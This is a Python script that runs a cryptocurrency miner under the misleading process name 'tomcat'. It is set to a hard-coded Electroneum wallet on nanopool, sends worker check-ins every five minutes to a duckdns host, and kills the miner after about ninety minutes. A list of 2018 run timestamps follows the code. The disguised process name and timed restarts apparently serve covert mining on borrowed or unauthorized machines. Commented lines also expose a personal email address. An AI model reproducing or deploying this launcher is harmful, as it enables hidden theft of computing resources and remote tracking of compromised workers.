import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:54:04.108205
#2018-02-17 16:43:04.115061
#2018-02-17 18:31:07.196326
#2018-02-17 20:19:02.134065
#2018-02-17 22:06:05.948708
#2018-02-17 23:50:03.847395
#2018-02-18 01:39:07.304751
#2018-02-18 03:26:05.400967
#2018-02-18 05:15:03.931911
#2018-02-18 07:07:05.913560
#2018-02-18 08:56:07.196344
#2018-02-18 10:43:03.703515
#2018-02-18 12:31:01.299717
#2018-02-18 14:18:05.409394
#2018-02-18 16:09:01.897552
#2018-02-18 17:59:06.127155
#2018-02-18 19:46:05.449060
#2018-02-18 21:33:01.319130
#2018-02-18 23:22:04.814669
#2018-02-19 01:09:04.912990
#2018-02-19 02:55:07.662108
#2018-02-19 04:42:07.538075
#2018-02-19 06:26:06.177918
#2018-02-19 08:16:08.519216
#2018-02-19 10:05:04.147592
#2018-02-19 11:54:07.966941
#2018-02-19 13:40:09.402189
#2018-02-19 15:29:02.061270
#2018-02-19 17:17:09.666933
#2018-02-19 19:04:06.545653
#2018-02-19 20:51:04.866171
#2018-02-19 22:38:04.061707
#2018-02-20 00:23:06.209956
#2018-02-20 02:12:06.473418
#2018-02-20 04:03:04.442248
#2018-02-20 05:46:07.326762
#2018-02-20 07:32:04.068099
#2018-02-20 09:17:07.098691
#2018-02-20 11:01:01.241167
#2018-02-20 12:48:08.683042
#2018-02-20 14:33:06.609886
#2018-02-20 16:17:07.544034
#2018-02-20 18:05:06.362857
#2018-02-20 19:56:09.196511
#2018-02-20 21:45:06.902544
#2018-02-20 23:26:04.050126
#2018-02-21 01:09:01.856734
#2018-02-21 02:54:07.050605
#2018-02-21 04:41:05.730653
#2018-02-21 06:29:06.715863
#2018-02-21 08:14:06.984216
#2018-02-21 10:01:09.283613
#2018-02-21 11:49:05.035435
#2018-02-21 13:39:03.826951
#2018-02-21 15:22:07.892820
#2018-02-21 17:12:01.770096
#2018-02-21 19:01:08.586218
#2018-02-21 20:50:01.303752
#2018-02-21 22:36:01.594499
#2018-02-22 00:25:03.037147
#2018-02-22 02:14:01.794780
#2018-02-22 04:01:05.127031
#2018-02-22 05:47:06.086740
#2018-02-22 07:34:05.674438
#2018-02-22 09:23:02.086120
#2018-02-22 11:08:08.998563
#2018-02-22 12:54:06.840538
#2018-02-22 14:42:09.324083
#2018-02-22 16:26:04.386432
#2018-02-22 18:14:01.749257
#2018-02-22 20:03:09.717455
#2018-02-22 21:52:07.353608
#2018-02-22 23:39:04.224018
#2018-02-23 01:26:04.316708
#2018-02-23 03:12:05.993900
#2018-02-23 05:01:06.952440
#2018-02-23 06:46:05.314710
#2018-02-23 08:34:04.878586
#2018-02-23 10:47:07.075642
#2018-02-23 12:42:08.042789
#2018-02-23 14:25:08.297852
#2018-02-23 16:16:07.971659
#2018-02-23 18:03:06.050136
#2018-02-23 19:47:09.576067
#2018-02-23 21:31:04.328357
#2018-02-23 23:19:01.494436
#2018-02-24 01:11:01.641798
#2018-02-24 03:02:07.189651
#2018-02-24 04:48:07.219989
#2018-02-24 06:32:01.452175
#2018-02-24 08:20:03.903659
#2018-02-24 10:04:02.072922
#2018-02-24 12:01:06.402944
#2018-02-24 13:48:05.063055
#2018-02-24 15:41:05.226897
#2018-02-24 17:34:07.314617
#2018-02-24 19:20:09.613380
#2018-02-24 21:11:04.269062
#2018-02-24 23:44:06.967840
#2018-02-25 03:05:06.933206
#2018-02-25 07:03:05.074987